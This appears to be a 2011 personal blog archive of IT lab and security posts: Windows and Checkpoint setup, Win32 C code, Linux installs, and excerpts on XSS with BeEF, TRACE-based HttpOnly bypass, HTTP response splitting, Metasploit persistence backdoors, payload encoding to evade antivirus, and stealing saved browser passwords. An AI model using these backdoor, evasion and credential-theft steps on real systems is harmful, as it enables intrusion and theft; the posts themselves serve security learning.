Showing posts from 2011

Microsoft CA lab

Microsoft Windows CA lab:
CA Workgroup:

CA Domain:

Raise DC:



Network Monitor:

Thanks for reading
All my Lab:
Linux Lab -- window and Cisco Lab
to be continued - I will update more.

5 steps to create a window with the Windows API in C

5 steps:
1. Initialize the class
2. Register the class
3. Create the window
4. Receive messages in WndProc
5. Translate messages and dispatch them

Step 1: Initialize the class
The way I like to do it:
const char g_szClassName[] = "myWindowClass";

Step 2: Registering the window class

In the WinMain() function:
WNDCLASSEX wc;
wc.cbSize        = sizeof(WNDCLASSEX);
wc.style         = 0;
wc.lpfnWndProc   = WndProc;
wc.cbClsExtra    = 0;
wc.cbWndExtra    = 0;
wc.hInstance     = hInstance;
wc.hIcon         = LoadIcon(NULL, IDI_APPLICATION);
wc.hCursor       = LoadCursor(NULL, IDC_ARROW);
wc.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
wc.lpszMenuName  = NULL;
wc.lpszClassName = g_szClassName;
wc.hIconSm       = LoadIcon(NULL, IDI_APPLICATION);

if(!RegisterClassEx(&wc))   /* register the class; stop if Windows rejects it */
{
    MessageBox(NULL, "Window Registration Failed!", "Error!",
        MB_ICONEXCLAMATION | MB_OK);
    return 0;
}

Step 3: Creating the window
Use the CreateWindowEx() function …

Checkpoint Policy

Public http and ftp:

Proventia through Checkpoint:

Server sensor through Checkpoint:


Install Solaris

Thanks to thuynguyenkim for recording and editing the video :))


Checkpoint VPN

VPN client to site:
SmartConsole config:

Client config and test:

VPN site to site:

VPN HCM and test:


XSS beef framework

XSS executes on the client side. You can use JavaScript and the DOM to steal data and cookies, deface pages....
I tried many times with JavaScript, but I found BeEF, an XSS framework. One step: include the hook script and send the malicious code to the victim:
If the XSS is in a POST request, you can create a page that will generate the POST request:


TRACE method with XST

TRACE method.
Today I will present one technique: the TRACE method. We know many HTTP methods: GET, POST, OPTIONS...
But we will focus on one method: TRACE. If we use it, the server gives us back a copy of our request:
icesurfer@nightblade ~ $ nc 80

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 31 Oct 2006 08:01:48 GMT
Connection: close
Content-Type: message/http
Content-Length: 39

Now I am going to talk about HttpOnly. It is one mechanism to protect cookies. HttpOnly is an additional flag included in a Set-Cookie HTTP response header. If the (optional) HttpOnly flag is included in the HTTP response header, the cookie cannot be accessed through client-side script.
So we can use it to prevent XSS attacks. But if the server supports the TRACE method, we can easily bypass it.

Now, let us review before the example. The TRACE method gives us back our whole request, which means we can read the cookie that was tagged HttpOnly. Remember …

HTTP cache poisoning

HTTP response splitting

First, look at this source code:
$ cat redir.php
header ("Location: " . $_GET['page']);

The "page" argument comes from the end user and redirects (302) to another page. Example:


Now we will talk about the HTTP request. Normally, if you request redir.php?page=test.html, the HTTP request looks like this:
GET http://localhost/redir.php?site=test.html
Host: localhost
User-Agent: Mozilla/4.7 [en] (WinNT; I)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

We will go to test.html. Notice the "page" variable: it is not filtered, so the end user can modify it.
Using CR (%0d) and LF (%0a), an attacker can control the HTTP request and make the server generate two responses to one request. How is that done?

This is the page variable:
The resulting answer from the vulnerable application:
HTTP/1.1 302 Moved Temporari…
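A defensive counterpart to redir.php, as an added example (my own Python, not the post's PHP): a Location validator that refuses the CR/LF the post relies on and off-site targets, beside a builder that reproduces the original unchecked header write; the allow-listed host and the sample "page" values are constructed.

```python
import re
from urllib.parse import urlsplit

# Constructed sample values for the "page" parameter (already URL-decoded, as
# $_GET would deliver them). The second one embeds CR/LF (%0d%0a) to end the
# redirect response early and smuggle a second, attacker-written response.
SAFE_PAGE = "test.html"
SPLIT_PAGE = ("test.html\r\nContent-Length: 0\r\n\r\n"
              "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
              "Content-Length: 5\r\n\r\nHello")

CTRL_CHARS = re.compile(r"[\x00-\x1f\x7f]")
ALLOWED_HOSTS = ("localhost",)  # assumption: the only host redir.php may send users to


def validate_redirect_target(page, allowed_hosts=ALLOWED_HOSTS):
    """Return the Location value to emit, or None if the input must be rejected.
    Any control character (CR, LF, NUL, ...) is refused outright, so the header
    can never be split; absolute URLs are limited to http(s) on allow-listed
    hosts, which also removes the open redirect in the original script."""
    if not page or CTRL_CHARS.search(page):
        return None
    parts = urlsplit(page)
    if parts.scheme or parts.netloc:           # absolute or scheme-relative (//host) URL
        if parts.scheme not in ("http", "https") or parts.netloc not in allowed_hosts:
            return None
    elif page.startswith("\\"):                # browsers treat "\\host" like "//host"
        return None
    return page


def build_redirect_unsafe(page):
    """What header("Location: " . $_GET['page']) produces: the value is pasted
    into the header line with no checks at all."""
    return "HTTP/1.1 302 Found\r\nLocation: " + page + "\r\nContent-Length: 0\r\n\r\n"


def build_redirect(page):
    """Hardened version: validate first, answer 400 instead of redirecting on bad input."""
    target = validate_redirect_target(page)
    if target is None:
        return "HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    return "HTTP/1.1 302 Found\r\nLocation: " + target + "\r\nContent-Length: 0\r\n\r\n"


def count_responses(raw):
    """Number of HTTP status lines in a raw response blob: 1 is normal, 2 means
    one request produced two responses, the splitting condition the post describes."""
    return len(re.findall(r"^HTTP/1\.[01] \d{3}", raw, re.MULTILINE))
```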

Install windows 3.1

The first OS I ever used :)).


Metasploit Backdoor Tutorial

Create persistence backdoor
Can be configured to connect back on system boot or user login
Time can be set between connect-back attempts
Under the hood
    Creates a VBS file on the victim and executes it
    Adds registry entries so it is autorun
Can be uninstalled remotely
    The VBS file must be deleted manually
meterpreter > run persistence
meterpreter > run persistence -A -U -i 10 -p 3000 -r

Metsvc backdoor
Runs as a service on the victim
Connect to it remotely
    No authentication required
Can be remotely uninstalled
    File needs to be deleted manually
Less noisy compared to persistence
    Attacker can connect when he wants
Can be found by port scanning
Demo: Backdoor with Metsvc

Create Executable from payloads
Use: msfpayload [var=val] [S]ummary|[C]|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecutable|[D]ll|[V]BA|[W]ar;
msfpayload windows/meterpreter/bind_tcp RHOST= X | bind_tcp.exe
Encoding to obfuscate the payload
Encode the payload to evade detection
Encode payloa…

Endian- VPN client to site (Host to network)

One friend asked me about it. I notice many companies in Vietnam like using Endian. But for me, I like Vyatta more, because I like dealing with routing. :))
It is simple to configure if you have some experience with OpenVPN. Endian uses OpenVPN for its VPN server.
And you will notice these settings in the client config:
dev tap : for the DHCP service
ca endian.pem : the CA cert; no client cert is used, unlike IPCop
remote endian IP or hostname : of course
auth-user-pass : the user and password that were created.



Metasploit, stealing data, get saved password and sniffing password

My friend asked me: what do you do after exploitation? I answered: privilege escalation, or stealing data. I have some advice: the phases of post-exploitation
1. Understanding the victim better
2. Privilege escalation
3. Deleting logs and killing monitoring software
4. Collecting data, executing programs
    Search for a file
    Download files
    Download registry
    Download application data
        Browser passwords/sessions
5. Backdoors and rootkits
6. Using the victim as a pivot to hack deeper into the network
I made one video demo of it: using Metasploit to steal data and get Firefox saved passwords:



Install l7-filter module for Iptables

To use menuconfig:
yum install -y ncurses-devel
Download required packages:
Download L7-filter kernel
Download L7-filter protocol definitions:
wget definitions/2009-05-28/l7-protocols-2009-05-28.tar.gz
Download Linux iptables 1.4.0
Download Linux kernel 2.6.26
Unpack them:
tar xvf linux-2.6.26.tar.bz2
tar xvf netfilter-layer7-v2.19.tar.gz
Apply the patch to the Linux kernel source:
cd linux-2.6.26
patch -p1 < ../netfilter-layer7-v2.19/kernel-2.6.25-layer7-2.19.patch
Apply the patch & install iptables 1.4.0:
tar -xvf iptables-1.4.0.tar.bz2
cd iptables-1.4.0
patch -p1 < ../netfilter-layer7-v2.19/iptables-1.4-for-kernel-2.6.20forward-layer7-2.19.patch
chmod +x extensions/.layer7-test
=== modified file 'extensions/libxt…

OpenCA tutorial

Install OpenCA tutorial

# yum install -y openssl-devel db4 db4-devel mysql-server mysql-devel perl-XML-Parser httpd
# rpm -Uvh openca-tools-1.3.0-1.el5.i386.rpm
# tar xvf openca-base-1.1.1.tar.gz
# cd openca-base-1.1.1
# mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 7
Server version: 5.0.77 Source distribution

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> create database openca;
Query OK, 1 row affected (0.00 sec)

mysql> GRANT ALL PRIVILEGES ON *.* TO 'openca'@'localhost' IDENTIFIED BY '123456';
Query OK, 0 rows affected (0.00 sec)

# mysql -u openca -p

./configure --prefix=/opt/openca \
                 --with-ca-organization="HBN CA Labs" \
                 --with-httpd-fs-prefix=/var/www \
                 --with-httpd-main-dir=pki \
                 --with-db-name=openca \
                 --with-db-host=localhost \

Install Solaris 10 - Tutorial by images

One note: give the VMware VM at least 580 MB of RAM: 539 MB if you install in text mode, 780 MB if you use graphic mode.

Install Redhat Enterprise - Graphic mode

Many people find it very hard to start learning Linux. In the past I spent 1 year and still could not install Linux :)).
So I wrote a detailed tutorial in images to help anyone who needs it.
First, you must have the Red Hat ISO. You can burn it to a CD or a USB stick. Then configure the BIOS to boot from it. After that, you can start the install. This is the boot window:
Press Enter to start (graphic mode). If you type text, you will use text mode
Skip to ignore the CD test
Start graphic mode
Choose language: English
Choose keyboard: English
Type your serial number: